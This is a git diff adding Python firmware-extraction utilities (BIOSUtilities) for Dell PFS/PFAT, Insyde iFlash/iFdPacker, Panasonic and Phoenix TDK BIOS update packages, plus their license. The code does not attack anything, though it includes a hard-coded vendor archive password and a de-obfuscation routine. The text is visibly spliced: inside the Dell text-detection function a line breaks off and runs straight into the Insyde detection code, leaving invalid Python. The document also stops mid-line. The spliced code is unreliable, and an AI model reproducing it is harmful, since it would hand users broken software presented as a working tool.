pfat_script_start = pfat_hdr_off + PFAT_HDR_LEN # PFAT Block Script Start + pfat_script_end = pfat_script_start + pfat_hdr.ScriptSize # PFAT Block Script End + pfat_script_data = pfat_payload[pfat_script_start:pfat_script_end] # PFAT Block Script Data + pfat_payload_start = pfat_script_end # PFAT Block Payload Start (at Script end) + pfat_payload_end = pfat_script_end + pfat_hdr.DataSize # PFAT Block Data End + pfat_payload_data = pfat_payload[pfat_payload_start:pfat_payload_end] # PFAT Block Raw Data + pfat_hdr_bgs_size = PFAT_HDR_LEN + pfat_hdr.ScriptSize # PFAT Block Header & Script Size + + # The PFAT Script End should match the total Entry Data Size w/o PFAT block + if pfat_hdr_bgs_size != pfat_entry.DataSize - pfat_hdr.DataSize: + printer(f'Error: Detected sub-PFS PFAT Block {pfat_entry_idx_ord} Header & PFAT Size mismatch!', padding + 16) + + # Get PFAT Header Flags (SFAM, ProtectEC, GFXMitDis, FTU, Reserved) + is_sfam,_,_,_,_ = pfat_hdr.get_flags() + + # Parse sub-PFS PFAT Signature, if applicable (only when PFAT Header > SFAM flag is set) + if is_sfam and len(pfat_payload[pfat_payload_end:pfat_payload_end + PFAT_SIG_LEN]) == PFAT_SIG_LEN: + # Get sub-PFS PFAT Signature Structure values + pfat_sig = get_struct(pfat_payload, pfat_payload_end, IntelBiosGuardSignature2k) + + # Show sub-PFS PFAT Signature Structure info + if structure: + printer(f'PFAT Block {pfat_entry_idx_ord} - Signature:\n', padding + 12) + pfat_sig.struct_print(padding + 16) + + # Show PFAT Script via BIOS Guard Script Tool + if structure: + printer(f'PFAT Block {pfat_entry_idx_ord} - Script:\n', padding + 12) + + _ = parse_bg_script(pfat_script_data, padding + 16) + + # The payload of sub-PFS PFAT Entries is not in proper order by default + # We can get each payload's order from PFAT Script > OpCode #2 (set I0 imm) + # PFAT Script OpCode #2 > Operand #3 stores the payload Offset in final image + pfat_entry_off = int.from_bytes(pfat_script_data[0xC:0x10], 'little') + + # We can get each payload's 
length from PFAT Script > OpCode #4 (set I2 imm) + # PFAT Script OpCode #4 > Operand #3 stores the payload Length in final image + pfat_entry_len = int.from_bytes(pfat_script_data[0x1C:0x20], 'little') + + # Check that the PFAT Entry Length from Header & Script match + if pfat_hdr.DataSize != pfat_entry_len: + printer(f'Error: Detected sub-PFS PFAT Block {pfat_entry_idx_ord} Header & Script Length mismatch!', padding + 12) + + # Initialize sub-PFS PFAT Entry Metadata Address + pfat_entry_adr = pfat_entry_off + + # Parse sub-PFS PFAT Entry/Block Metadata + if len(pfat_entry_met) >= PFS_PFAT_LEN: + # Get sub-PFS PFAT Metadata Structure values + pfat_met = get_struct(pfat_entry_met, 0, DellPfsPfatMetadata) + + # Store sub-PFS PFAT Entry Metadata Address + pfat_entry_adr = pfat_met.Address + + # Show sub-PFS PFAT Metadata Structure info + if structure: + printer(f'PFAT Block {pfat_entry_idx_ord} - Metadata:\n', padding + 12) + pfat_met.struct_print(padding + 16) + + # Another way to get each PFAT Entry Offset is from its Metadata, if applicable + # Check that the PFAT Entry Offsets from PFAT Script and PFAT Metadata match + if pfat_entry_off != pfat_met.Offset: + printer(f'Error: Detected sub-PFS PFAT Block {pfat_entry_idx_ord} Metadata & PFAT Offset mismatch!', padding + 16) + pfat_entry_off = pfat_met.Offset # Prefer Offset from Metadata, in case PFAT Script differs + + # Another way to get each PFAT Entry Length is from its Metadata, if applicable + # Check that the PFAT Entry Length from PFAT Script and PFAT Metadata match + if not (pfat_hdr.DataSize == pfat_entry_len == pfat_met.DataSize): + printer(f'Error: Detected sub-PFS PFAT Block {pfat_entry_idx_ord} Metadata & PFAT Length mismatch!', padding + 16) + + # Check that the PFAT Entry payload Size from PFAT Header matches the one from PFAT Metadata + if pfat_hdr.DataSize != pfat_met.DataSize: + printer(f'Error: Detected sub-PFS PFAT Block {pfat_entry_idx_ord} Metadata & PFAT Block Size mismatch!', padding + 16) + + # Get sub-PFS Entry Raw Data by subtracting PFAT Header & Script from PFAT Entry Data + pfat_entry_data_raw = pfat_entry_data[pfat_hdr_bgs_size:] + + # The sub-PFS Entry Raw Data (w/o PFAT Header & Script) should match with the PFAT Block payload + if pfat_entry_data_raw != pfat_payload_data: + printer(f'Error: Detected sub-PFS PFAT Block {pfat_entry_idx_ord} w/o PFAT & PFAT Block Data mismatch!', padding + 16) + pfat_entry_data_raw = pfat_payload_data # Prefer Data from PFAT Block, in case PFAT Entry differs + + # Store each sub-PFS PFAT Entry/Block Offset, Address, Ordinal Index and Payload/Raw Data + # Goal is to sort these based on Offset first and Address second, in cases of same Offset + # For example, Precision 3430 has two PFAT Entries with the same Offset of 0x40000 at both + # BG Script and PFAT Metadata but their PFAT Metadata Address is 0xFF040000 and 0xFFA40000 + pfat_entries_all.append((pfat_entry_off, pfat_entry_adr, pfat_entry_idx_ord, pfat_entry_data_raw)) + + # Check if next sub-PFS PFAT Entry offset is valid + if pfat_next_entry <= 0: + printer(f'Error: Detected sub-PFS PFAT Block {pfat_entry_idx_ord} with invalid next PFAT Block offset!', padding + 16) + pfat_next_entry += pfs_entry_size # Avoid a potential infinite loop if next sub-PFS PFAT Entry offset is bad + + pfat_entry_start = pfat_next_entry # Next sub-PFS PFAT Entry starts after sub-PFS Entry Metadata Signature + + pfat_entry_index += 1 + + pfat_entries_all.sort() # Sort all sub-PFS PFAT Entries based on their Offset/Address + + block_start_exp = 0 
# Initialize sub-PFS PFAT Entry expected Offset + total_pfat_data = b'' # Initialize final/ordered sub-PFS Entry Data + + # Parse all sorted sub-PFS PFAT Entries and merge their payload/data + for block_start,_,block_index,block_data in pfat_entries_all: + # Fill any data gaps between sorted sub-PFS PFAT Entries with padding + # For example, Precision 7960 v0.16.68 has gap at 0x1190000-0x11A0000 + block_data_gap = block_start - block_start_exp + if block_data_gap > 0: + printer(f'Warning: Filled sub-PFS PFAT {block_index} data gap 0x{block_data_gap:X} [0x{block_start_exp:X}-0x{block_start:X}]!', padding + 8) + total_pfat_data += b'\xFF' * block_data_gap # Use 0xFF padding to fill in data gaps in PFAT UEFI firmware images + + total_pfat_data += block_data # Append sorted sub-PFS PFAT Entry payload/data + + block_start_exp = len(total_pfat_data) # Set next sub-PFS PFAT Entry expected Start + + # Verify that the end offset of the last PFAT Entry matches the final sub-PFS Entry Data Size + if len(total_pfat_data) != pfat_entries_all[-1][0] + len(pfat_entries_all[-1][3]): + printer('Error: Detected sub-PFS PFAT total buffer size and last block end mismatch!', padding + 8) + + # Analyze sub-PFS Footer Structure + chk_pfs_ftr(pfat_footer, pfat_payload, entry_hdr.PayloadSize, 'Sub-PFS', padding + 4, structure) + + return total_pfat_data + +# Get Dell PFS Entry Structure & Size via its Version +def get_pfs_entry(buffer, offset): + pfs_entry_ver = int.from_bytes(buffer[offset + 0x10:offset + 0x14], 'little') # PFS Entry Version + + if pfs_entry_ver == 1: + return DellPfsEntryR1, ctypes.sizeof(DellPfsEntryR1) + + if pfs_entry_ver == 2: + return DellPfsEntryR2, ctypes.sizeof(DellPfsEntryR2) + + return DellPfsEntryR2, ctypes.sizeof(DellPfsEntryR2) + +# Determine Dell PFS Entry Version string +def get_entry_ver(version_fields, version_types): + version = '' # Initialize Version string + + # Each Version Type (1 byte) determines the type of each Version Value (2 bytes) + # Version Type 'N' is Number, 'A' is Text and ' ' is Empty/Unused + for index,field in enumerate(version_fields): + eol = '' if index == len(version_fields) - 1 else '.' 
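# Worked example (hypothetical values): version_fields = (1, 12, 0, 0) with
# version_types = (78, 78, 0, 0) runs the branches below as Number, Number,
# Unused, Unused and produces the version string '1.12'.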
+ + if version_types[index] == 65: + version += f'{field:X}{eol}' # 0x41 = ASCII + elif version_types[index] == 78: + version += f'{field:d}{eol}' # 0x4E = Number + elif version_types[index] in (0, 32): + version = version.strip('.') # 0x00 or 0x20 = Unused + else: + version += f'{field:X}{eol}' # Unknown + + return version + +# Check if Dell PFS Header Version is known +def chk_hdr_ver(version, text, padding=0): + if version in (1,2): + return + + printer(f'Error: Unknown {text} Header Version {version}!', padding) + + return + +# Analyze Dell PFS Footer Structure +def chk_pfs_ftr(footer_buffer, data_buffer, data_size, text, padding=0, structure=True): + # Get PFS Footer Structure values + pfs_ftr = get_struct(footer_buffer, 0, DellPfsFooter) + + # Validate that a PFS Footer was parsed + if pfs_ftr.Tag == b'PFS.FTR.': + # Show PFS Footer Structure info + if structure: + printer('PFS Footer:\n', padding + 4) + pfs_ftr.struct_print(padding + 8) + else: + printer(f'Error: {text} Footer could not be found!', padding + 4) + + # Validate that PFS Header Payload Size matches the one at PFS Footer + if data_size != pfs_ftr.PayloadSize: + printer(f'Error: {text} Header & Footer Payload Size mismatch!', padding + 4) + + # Calculate the PFS Payload Data CRC-32 w/ Vector 0 + pfs_ftr_crc = ~zlib.crc32(data_buffer, 0) & 0xFFFFFFFF + + # Validate PFS Payload Data Checksum via PFS Footer + if pfs_ftr.Checksum != pfs_ftr_crc: + printer(f'Error: Invalid {text} Footer Payload Checksum!', padding + 4) + +# Write/Extract Dell PFS Entry Files (Data, Metadata, Signature) +def pfs_file_write(bin_buff, bin_name, bin_type, full_name, out_path, padding=0, structure=True, advanced=True): + # Store Data/Metadata Signature (advanced users only) + if bin_name.startswith('sign'): + final_name = f'{safe_name(full_name)}.{bin_name.split("_")[1]}.sig' + final_path = os.path.join(out_path, final_name) + + with open(final_path, 'wb') as pfs_out: + pfs_out.write(bin_buff) # Write final Data/Metadata Signature + + return # Skip further processing for Signatures + + # Store Data/Metadata Payload + bin_ext = f'.{bin_name}.bin' if advanced else '.bin' # Simpler Data/Metadata Extension for non-advanced users + + # Some Data may be Text or XML files with useful information for non-advanced users + is_text,final_data,file_ext,write_mode = bin_is_text(bin_buff, bin_type, bin_name == 'meta', padding, structure, advanced) + + final_name = f'{safe_name(full_name)}{bin_ext[:-4] + file_ext if is_text else bin_ext}' + final_path = os.path.join(out_path, final_name) + + with open(final_path, write_mode) as pfs_out: + pfs_out.write(final_data) # Write final Data/Metadata Payload + +# Check if Dell PFS Entry file/data is Text/XML and Convert +def bin_is_text(buffer, file_type, is_metadata, padding=0, structure=True, advanced=True): + is_text = False + write_mode = 'wb' + extension = '.bin' + buffer_in = buffer + + if b',END' in buffer[-0x8:]: # Text Type 1 + is_text = True + write_mode = 'w' + extension = '.txt' + buffer = buffer.decode('utf-8').split(',END')[0].replace(';','\n') + elif buffer.startswith(b'VendorName=Dell'): # Text Type 2 + is_text = True + write_mode = 'w' + extension = '.txt' + buffer = buffer.split(b'\x00')[0].decode('utf-8').replace(';','\n') + elif b' len(input_buffer): + continue + + iflash_match_all.append([ifl_bgn, ifl_hdr]) + + return iflash_match_all + +# Extract Insyde iFlash Update image +def insyde_iflash_extract(input_buffer, extract_path, padding=0): + insyde_iflash_all = insyde_iflash_detect(input_buffer) + + 
if not insyde_iflash_all: + return 127 + + printer('Detected Insyde iFlash Update image!', padding) + + make_dirs(extract_path, delete=True) + + exit_codes = [] + + for insyde_iflash in insyde_iflash_all: + exit_code = 0 + + ifl_bgn,ifl_hdr = insyde_iflash + + img_bgn = ifl_bgn + INS_IFL_LEN + img_end = img_bgn + ifl_hdr.ImageSize + img_bin = input_buffer[img_bgn:img_end] + + if len(img_bin) != ifl_hdr.ImageSize: + exit_code = 1 + + img_val = [ifl_hdr.get_image_tag(), 'bin'] + img_tag,img_ext = INS_IFL_IMG.get(img_val[0], img_val) + + img_name = f'{img_tag} [0x{img_bgn:08X}-0x{img_end:08X}]' + + printer(f'{img_name}\n', padding + 4) + + ifl_hdr.struct_print(padding + 8) + + if img_val == [img_tag,img_ext]: + printer(f'Note: Detected new Insyde iFlash tag {img_tag}!', padding + 12, pause=True) + + out_name = f'{img_name}.{img_ext}' + + out_path = os.path.join(extract_path, safe_name(out_name)) + + with open(out_path, 'wb') as out_image: + out_image.write(img_bin) + + printer(f'Succesfull Insyde iFlash > {img_tag} extraction!', padding + 12) + + exit_codes.append(exit_code) + + return sum(exit_codes) + +# Extract Insyde iFdPacker 7-Zip SFX 7z Update image +def insyde_packer_extract(input_buffer, extract_path, padding=0): + match_sfx = PAT_INSYDE_SFX.search(input_buffer) + + if not match_sfx: + return 127 + + printer('Detected Insyde iFdPacker Update image!', padding) + + make_dirs(extract_path, delete=True) + + sfx_buffer = bytearray(input_buffer[match_sfx.end() - 0x5:]) + + if sfx_buffer[:0x5] == b'\x6E\xF4\x79\x5F\x4E': + printer('Detected Insyde iFdPacker > 7-Zip SFX > Obfuscation!', padding + 4) + + for index,byte in enumerate(sfx_buffer): + sfx_buffer[index] = byte // 2 + (128 if byte % 2 else 0) + + printer('Removed Insyde iFdPacker > 7-Zip SFX > Obfuscation!', padding + 8) + + printer('Extracting Insyde iFdPacker > 7-Zip SFX archive...', padding + 4) + + if bytes(INS_SFX_PWD, 'utf-16le') in input_buffer[:match_sfx.start()]: + printer('Detected Insyde iFdPacker > 7-Zip SFX > Password!', padding + 8) + printer(INS_SFX_PWD, padding + 12) + + sfx_path = os.path.join(extract_path, 'Insyde_iFdPacker_SFX.7z') + + with open(sfx_path, 'wb') as sfx_file: + sfx_file.write(sfx_buffer) + + if is_szip_supported(sfx_path, padding + 8, args=[f'-p{INS_SFX_PWD}'], check=True): + if szip_decompress(sfx_path, extract_path, 'Insyde iFdPacker > 7-Zip SFX', + padding + 8, args=[f'-p{INS_SFX_PWD}'], check=True) == 0: + os.remove(sfx_path) + else: + return 125 + else: + return 126 + + exit_codes = [] + + for sfx_file in get_path_files(extract_path): + if is_insyde_ifd(sfx_file): + printer(f'{os.path.basename(sfx_file)}', padding + 12) + + ifd_code = insyde_ifd_extract(sfx_file, get_extract_path(sfx_file), padding + 16) + + exit_codes.append(ifd_code) + + return sum(exit_codes) + +# Insyde iFdPacker known 7-Zip SFX Password +INS_SFX_PWD = 'Y`t~i!L@i#t$U%h^s7A*l(f)E-d=y+S_n?i' + +# Insyde iFlash known Image Names +INS_IFL_IMG = { + 'BIOSCER' : ['Certificate', 'bin'], + 'BIOSCR2' : ['Certificate 2nd', 'bin'], + 'BIOSIMG' : ['BIOS-UEFI', 'bin'], + 'DRV_IMG' : ['isflash', 'efi'], + 'EC_IMG' : ['Embedded Controller', 'bin'], + 'INI_IMG' : ['platform', 'ini'], + 'ME_IMG' : ['Management Engine', 'bin'], + 'OEM_ID' : ['OEM Identifier', 'bin'], + } + +# Get common ctypes Structure Sizes +INS_IFL_LEN = ctypes.sizeof(IflashHeader) + +if __name__ == '__main__': + BIOSUtility(TITLE, is_insyde_ifd, insyde_ifd_extract).run_utility() diff --git a/blobs/t480/biosutilities/LICENSE b/blobs/t480/biosutilities/LICENSE new file 
mode 100644 index 00000000..06831fb2 --- /dev/null +++ b/blobs/t480/biosutilities/LICENSE @@ -0,0 +1,19 @@ +Copyright (c) 2019-2022 Plato Mavropoulos + +Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. + +Subject to the terms and conditions of this license, each copyright holder and contributor hereby grants to those receiving rights under this license a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except for failure to satisfy the conditions of this license) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer this software, where such license applies only to those patent claims, already acquired or hereafter acquired, licensable by such copyright holder or contributor that are necessarily infringed by: + +(a) their Contribution(s) (the licensed copyrights of copyright holders and non-copyrightable additions of contributors, in source or binary form) alone; or + +(b) combination of their Contribution(s) with the work of authorship to which such Contribution(s) was added by such copyright holder or contributor, if, at the time the Contribution is added, such addition causes such combination to be necessarily infringed. The patent license shall not apply to any other combinations which include the Contribution. + +Except as expressly stated above, no rights or licenses from any copyright holder or contributor is granted under this license, whether expressly, by implication, estoppel or otherwise. + +DISCLAIMER + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
\ No newline at end of file diff --git a/blobs/t480/biosutilities/Panasonic_BIOS_Extract.py b/blobs/t480/biosutilities/Panasonic_BIOS_Extract.py new file mode 100644 index 00000000..096bec3d --- /dev/null +++ b/blobs/t480/biosutilities/Panasonic_BIOS_Extract.py @@ -0,0 +1,209 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Panasonic BIOS Extract +Panasonic BIOS Package Extractor +Copyright (C) 2018-2022 Plato Mavropoulos +""" + +TITLE = 'Panasonic BIOS Package Extractor v2.0_a10' + +import os +import io +import sys +import lznt1 +import pefile + +# Stop __pycache__ generation +sys.dont_write_bytecode = True + +from common.comp_szip import is_szip_supported, szip_decompress +from common.path_ops import get_path_files, make_dirs, path_stem, safe_name +from common.pe_ops import get_pe_file, get_pe_info, is_pe_file, show_pe_info +from common.patterns import PAT_MICROSOFT_CAB +from common.system import printer +from common.templates import BIOSUtility +from common.text_ops import file_to_bytes + +from AMI_PFAT_Extract import is_ami_pfat, parse_pfat_file + +# Check if input is Panasonic BIOS Package PE +def is_panasonic_pkg(in_file): + in_buffer = file_to_bytes(in_file) + + pe_file = get_pe_file(in_buffer, fast=True) + + if not pe_file: + return False + + pe_info = get_pe_info(pe_file) + + if not pe_info: + return False + + if pe_info.get(b'FileDescription',b'').upper() != b'UNPACK UTILITY': + return False + + if not PAT_MICROSOFT_CAB.search(in_buffer): + return False + + return True + +# Search and Extract Panasonic BIOS Package PE CAB archive +def panasonic_cab_extract(buffer, extract_path, padding=0): + pe_path,pe_file,pe_info = [None] * 3 + + cab_bgn = PAT_MICROSOFT_CAB.search(buffer).start() + cab_len = int.from_bytes(buffer[cab_bgn + 0x8:cab_bgn + 0xC], 'little') + cab_end = cab_bgn + cab_len + cab_bin = buffer[cab_bgn:cab_end] + cab_tag = f'[0x{cab_bgn:06X}-0x{cab_end:06X}]' + + cab_path = os.path.join(extract_path, f'CAB_{cab_tag}.cab') + + with open(cab_path, 'wb') as cab_file: + cab_file.write(cab_bin) # Store CAB archive + + if is_szip_supported(cab_path, padding, check=True): + printer(f'Panasonic BIOS Package > PE > CAB {cab_tag}', padding) + + if szip_decompress(cab_path, extract_path, 'CAB', padding + 4, check=True) == 0: + os.remove(cab_path) # Successful extraction, delete CAB archive + else: + return pe_path, pe_file, pe_info + else: + return pe_path, pe_file, pe_info + + for file_path in get_path_files(extract_path): + pe_file = get_pe_file(file_path, fast=True) + if pe_file: + pe_info = get_pe_info(pe_file) + if pe_info.get(b'FileDescription',b'').upper() == b'BIOS UPDATE': + pe_path = file_path + break + else: + return pe_path, pe_file, pe_info + + return pe_path, pe_file, pe_info + +# Extract & Decompress Panasonic BIOS Update PE RCDATA (LZNT1) +def panasonic_res_extract(pe_name, pe_file, extract_path, padding=0): + is_rcdata = False + + # When fast_load is used, IMAGE_DIRECTORY_ENTRY_RESOURCE must be parsed prior to RCDATA Directories + pe_file.parse_data_directories(directories=[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_RESOURCE']]) + + # Parse all Resource Data Directories > RCDATA (ID = 10) + for entry in pe_file.DIRECTORY_ENTRY_RESOURCE.entries: + if entry.struct.name == 'IMAGE_RESOURCE_DIRECTORY_ENTRY' and entry.struct.Id == 0xA: + is_rcdata = True + for resource in entry.directory.entries: + res_bgn = resource.directory.entries[0].data.struct.OffsetToData + res_len = resource.directory.entries[0].data.struct.Size + res_end = res_bgn + res_len + res_bin = 
pe_file.get_data(res_bgn, res_len) + res_tag = f'{pe_name} [0x{res_bgn:06X}-0x{res_end:06X}]' + res_out = os.path.join(extract_path, f'{res_tag}') + + printer(res_tag, padding + 4) + + try: + res_raw = lznt1.decompress(res_bin[0x8:]) + + printer('Succesfull LZNT1 decompression via lznt1!', padding + 8) + except Exception: + res_raw = res_bin + + printer('Succesfull PE Resource extraction!', padding + 8) + + # Detect & Unpack AMI BIOS Guard (PFAT) BIOS image + if is_ami_pfat(res_raw): + pfat_dir = os.path.join(extract_path, res_tag) + + parse_pfat_file(res_raw, pfat_dir, padding + 12) + else: + if is_pe_file(res_raw): + res_ext = 'exe' + elif res_raw.startswith(b'[') and res_raw.endswith((b'\x0D\x0A',b'\x0A')): + res_ext = 'txt' + else: + res_ext = 'bin' + + if res_ext == 'txt': + printer(new_line=False) + for line in io.BytesIO(res_raw).readlines(): + line_text = line.decode('utf-8','ignore').rstrip() + printer(line_text, padding + 12, new_line=False) + + with open(f'{res_out}.{res_ext}', 'wb') as out_file: + out_file.write(res_raw) + + return is_rcdata + +# Extract Panasonic BIOS Update PE Data when RCDATA is not available +def panasonic_img_extract(pe_name, pe_path, pe_file, extract_path, padding=0): + pe_data = file_to_bytes(pe_path) + + sec_bgn = pe_file.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].VirtualAddress + img_bgn = pe_file.OPTIONAL_HEADER.BaseOfData + pe_file.OPTIONAL_HEADER.SizeOfInitializedData + img_end = sec_bgn or len(pe_data) + img_bin = pe_data[img_bgn:img_end] + img_tag = f'{pe_name} [0x{img_bgn:X}-0x{img_end:X}]' + img_out = os.path.join(extract_path, f'{img_tag}.bin') + + printer(img_tag, padding + 4) + + with open(img_out, 'wb') as out_img: + out_img.write(img_bin) + + printer('Succesfull PE Data extraction!', padding + 8) + + return bool(img_bin) + +# Parse & Extract Panasonic BIOS Package PE +def panasonic_pkg_extract(input_file, extract_path, padding=0): + input_buffer = file_to_bytes(input_file) + + make_dirs(extract_path, delete=True) + + pkg_pe_file = get_pe_file(input_buffer, fast=True) + + if not pkg_pe_file: + return 2 + + pkg_pe_info = get_pe_info(pkg_pe_file) + + if not pkg_pe_info: + return 3 + + pkg_pe_name = path_stem(input_file) + + printer(f'Panasonic BIOS Package > PE ({pkg_pe_name})\n', padding) + + show_pe_info(pkg_pe_info, padding + 4) + + upd_pe_path,upd_pe_file,upd_pe_info = panasonic_cab_extract(input_buffer, extract_path, padding + 4) + + if not (upd_pe_path and upd_pe_file and upd_pe_info): + return 4 + + upd_pe_name = safe_name(path_stem(upd_pe_path)) + + printer(f'Panasonic BIOS Update > PE ({upd_pe_name})\n', padding + 12) + + show_pe_info(upd_pe_info, padding + 16) + + is_upd_res, is_upd_img = False, False + + is_upd_res = panasonic_res_extract(upd_pe_name, upd_pe_file, extract_path, padding + 16) + + if not is_upd_res: + is_upd_img = panasonic_img_extract(upd_pe_name, upd_pe_path, upd_pe_file, extract_path, padding + 16) + + os.remove(upd_pe_path) + + return 0 if is_upd_res or is_upd_img else 1 + +if __name__ == '__main__': + BIOSUtility(TITLE, is_panasonic_pkg, panasonic_pkg_extract).run_utility() diff --git a/blobs/t480/biosutilities/Phoenix_TDK_Extract.py b/blobs/t480/biosutilities/Phoenix_TDK_Extract.py new file mode 100644 index 00000000..3328ad41 --- /dev/null +++ b/blobs/t480/biosutilities/Phoenix_TDK_Extract.py @@ -0,0 +1,243 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Phoenix TDK Extract +Phoenix TDK Packer Extractor +Copyright (C) 2021-2022 Plato Mavropoulos +""" + +TITLE = 
'Phoenix TDK Packer Extractor v2.0_a10' + +import os +import sys +import lzma +import ctypes + +# Stop __pycache__ generation +sys.dont_write_bytecode = True + +from common.path_ops import make_dirs, safe_name +from common.pe_ops import get_pe_file, get_pe_info +from common.patterns import PAT_MICROSOFT_MZ, PAT_MICROSOFT_PE, PAT_PHOENIX_TDK +from common.struct_ops import char, get_struct, uint32_t +from common.system import printer +from common.templates import BIOSUtility +from common.text_ops import file_to_bytes + +class PhoenixTdkHeader(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('Tag', char*8), # 0x00 + ('Size', uint32_t), # 0x08 + ('Count', uint32_t), # 0x0C + # 0x10 + ] + + def _get_tag(self): + return self.Tag.decode('utf-8','ignore').strip() + + def struct_print(self, p): + printer(['Tag :', self._get_tag()], p, False) + printer(['Size :', f'0x{self.Size:X}'], p, False) + printer(['Entries:', self.Count], p, False) + +class PhoenixTdkEntry(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('Name', char*256), # 0x000 + ('Offset', uint32_t), # 0x100 + ('Size', uint32_t), # 0x104 + ('Compressed', uint32_t), # 0x108 + ('Reserved', uint32_t), # 0x10C + # 0x110 + ] + + COMP = {0: 'None', 1: 'LZMA'} + + def __init__(self, mz_base, *args, **kwargs): + super().__init__(*args, **kwargs) + self.Base = mz_base + + def get_name(self): + return self.Name.decode('utf-8','replace').strip() + + def get_offset(self): + return self.Base + self.Offset + + def get_compression(self): + return self.COMP.get(self.Compressed, f'Unknown ({self.Compressed})') + + def struct_print(self, p): + printer(['Name :', self.get_name()], p, False) + printer(['Offset :', f'0x{self.get_offset():X}'], p, False) + printer(['Size :', f'0x{self.Size:X}'], p, False) + printer(['Compression:', self.get_compression()], p, False) + printer(['Reserved :', f'0x{self.Reserved:X}'], p, False) + +# Get Phoenix TDK Executable (MZ) Base Offset +def get_tdk_base(in_buffer, pack_off): + tdk_base_off = None # Initialize Phoenix TDK Base MZ Offset + + # Scan input file for all Microsoft executable patterns (MZ) before TDK Header Offset + mz_all = [mz for mz in PAT_MICROSOFT_MZ.finditer(in_buffer) if mz.start() < pack_off] + + # Phoenix TDK Header structure is an index table for all TDK files + # Each TDK file is referenced from the TDK Packer executable base + # The TDK Header is always at the end of the TDK Packer executable + # Thus, prefer the TDK Packer executable (MZ) closest to TDK Header + # For speed, check MZ closest to (or at) 0x0 first (expected input) + mz_ord = [mz_all[0]] + list(reversed(mz_all[1:])) + + # Parse each detected MZ + for mz in mz_ord: + mz_off = mz.start() + + # MZ (DOS) > PE (NT) image Offset is found at offset 0x3C-0x40 relative to MZ base + pe_off = mz_off + int.from_bytes(in_buffer[mz_off + 0x3C:mz_off + 0x40], 'little') + + # Skip MZ (DOS) with bad PE (NT) image Offset + if pe_off == mz_off or pe_off >= pack_off: + continue + + # Check if potential MZ > PE image magic value is valid + if PAT_MICROSOFT_PE.search(in_buffer[pe_off:pe_off + 0x4]): + try: + # Parse detected MZ > PE > Image, quickly (fast_load) + pe_file = get_pe_file(in_buffer[mz_off:], fast=True) + + # Parse detected MZ > PE > Info + pe_info = get_pe_info(pe_file) + + # Parse detected MZ > PE > Info > Product Name + pe_name = pe_info.get(b'ProductName',b'') + except Exception: + # Any error means no MZ > PE > Info > Product Name + pe_name = b'' + + # Check for valid Phoenix TDK Packer PE > Product Name + # 
Expected value is "TDK Packer (Extractor for Windows)" + if pe_name.upper().startswith(b'TDK PACKER'): + # Set TDK Base Offset to valid TDK Packer MZ offset + tdk_base_off = mz_off + + # Stop parsing detected MZ once TDK Base Offset is found + if tdk_base_off is not None: + break + else: + # No TDK Base Offset could be found, assume 0x0 + tdk_base_off = 0x0 + + return tdk_base_off + +# Scan input buffer for valid Phoenix TDK image +def get_phoenix_tdk(in_buffer): + # Scan input buffer for Phoenix TDK pattern + tdk_match = PAT_PHOENIX_TDK.search(in_buffer) + + if not tdk_match: + return None, None + + # Set Phoenix TDK Header ($PACK) Offset + tdk_pack_off = tdk_match.start() + + # Get Phoenix TDK Executable (MZ) Base Offset + tdk_base_off = get_tdk_base(in_buffer, tdk_pack_off) + + return tdk_base_off, tdk_pack_off + +# Check if input contains valid Phoenix TDK image +def is_phoenix_tdk(in_file): + buffer = file_to_bytes(in_file) + + return bool(get_phoenix_tdk(buffer)[1] is not None) + +# Parse & Extract Phoenix Tools Development Kit (TDK) Packer +def phoenix_tdk_extract(input_file, extract_path, padding=0): + exit_code = 0 + + input_buffer = file_to_bytes(input_file) + + make_dirs(extract_path, delete=True) + + printer('Phoenix Tools Development Kit Packer', padding) + + base_off,pack_off = get_phoenix_tdk(input_buffer) + + # Parse TDK Header structure + tdk_hdr = get_struct(input_buffer, pack_off, PhoenixTdkHeader) + + # Print TDK Header structure info + printer('Phoenix TDK Header:\n', padding + 4) + tdk_hdr.struct_print(padding + 8) + + # Check if reported TDK Header Size matches manual TDK Entry Count calculation + if tdk_hdr.Size != TDK_HDR_LEN + TDK_DUMMY_LEN + tdk_hdr.Count * TDK_MOD_LEN: + printer('Error: Phoenix TDK Header Size & Entry Count mismatch!\n', padding + 8, pause=True) + exit_code = 1 + + # Store TDK Entries offset after the placeholder data + entries_off = pack_off + TDK_HDR_LEN + TDK_DUMMY_LEN + + # Parse and extract each TDK Header Entry + for entry_index in range(tdk_hdr.Count): + # Parse TDK Entry structure + tdk_mod = get_struct(input_buffer, entries_off + entry_index * TDK_MOD_LEN, PhoenixTdkEntry, [base_off]) + + # Print TDK Entry structure info + printer(f'Phoenix TDK Entry ({entry_index + 1}/{tdk_hdr.Count}):\n', padding + 8) + tdk_mod.struct_print(padding + 12) + + # Get TDK Entry raw data Offset (TDK Base + Entry Offset) + mod_off = 